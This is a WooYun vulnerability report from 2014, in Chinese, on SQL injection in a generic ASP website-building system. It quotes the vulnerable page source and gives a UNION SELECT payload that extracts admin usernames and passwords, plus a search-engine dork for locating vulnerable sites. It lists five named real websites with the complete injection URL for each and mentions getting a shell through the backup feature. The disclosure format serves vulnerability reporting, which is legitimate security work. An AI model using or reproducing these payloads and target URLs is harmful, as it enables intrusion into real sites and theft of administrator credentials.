当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070254

漏洞标题:某通用型asp企业建站 sql注入漏洞

相关厂商:某通用型asp企业建站系统

漏洞作者: roker

提交时间:2014-07-30 11:17

修复时间:2014-10-28 11:18

公开时间:2014-10-28 11:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-30: 细节已通知厂商并且等待厂商处理中
2014-07-30: 厂商已经确认,细节仅向厂商公开
2014-08-02: 细节向第三方安全合作伙伴开放
2014-09-23: 细节向核心白帽子及相关领域专家公开
2014-10-03: 细节向普通白帽子公开
2014-10-13: 细节向实习白帽子公开
2014-10-28: 细节向公众公开

简要描述:

rt

详细说明:


http://www.xusoft09.cn/
ReadArticlemb.asp

<%
Dim id
id=request.querystring("id")
Set rs = Server.Createobject("ADODB.recordset")
asql="select  *   from   Article  where id="&id&"   order by id desc"
rs.open asql,Cn
response.write asql
if  rs.eof and  rs.bof then
response.write"该内容不存在!"
response.end
else
datetime=rs("date")
title_5=rs("title")
IDD_5=rs("id")
LeftTitle_5=left(title_5,12)
BigClass_5=rs("BigClass")
Pathfilename=rs("Pathfilename")
Article=rs("Article")
KeyWords=rs("KeyWords")
Description=rs("Description")
NoClass=rs("NoClass")
Set rs1 = Server.Createobject("ADODB.recordset")
asql1="select  *   from   BigClass  where ClassCode='"&BigClass_5&"'   order by id desc"
rs1.open asql1,Cn
BigClass08=rs1("BigClass")
ClassCode08=rs1("ClassCode")
%><code>
id没有过滤
rs.open asql,Cn后 ClassCode有值时即可 union 爆用户密码,默认 a 是 有值的,也可以通过观察页面内容 来获取其值。
exp : <code>ReadArticlemb.asp?id=2 and 1 = 2 union select 1,'a',nm,pw,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20admin


12.jpg


关键字 

inurl:"ReadArticlemb.asp"


11.jpg


提供5个实例 用以通用性证明
http://www.jinjian.cn/ReadArticlemb.asp?id=343%20and%201%20=%202%20union%20select%201,%27a%27,nm,pw,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20admin
http://www.qgsb-zc.com/ReadArticlemb.asp?id=453%20and%201%20=%202%20union%20select%201,%27a%27,nm,pw,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20admin
http://www.hrb-hp.com/ReadArticlemb.asp?id=330%20and%201%20=%202%20union%20select%201,%27a%27,nm,pw,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20admin
http://www.hzy291.com/ReadArticlemb.asp?id=402%20and%201%20=%202%20union%20select%20nm,%27a%27,nm,pw,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20admin
http://www.syysjd.com/ReadArticlemb.asp?id=334%20and%201%20=%202%20union%20select%201,%27lanwan4%27,nm,pw,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20admin
后台备份数据改包 即可gethell

漏洞证明:

如上所述

修复方案:

过滤呗

版权声明:转载请注明来源 roker@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-07-30 14:29

厂商回复:

CNVD暂无法建立与软件生产厂商的直接联系渠道,暂未列入处置流程,待认领。

最新状态:

暂无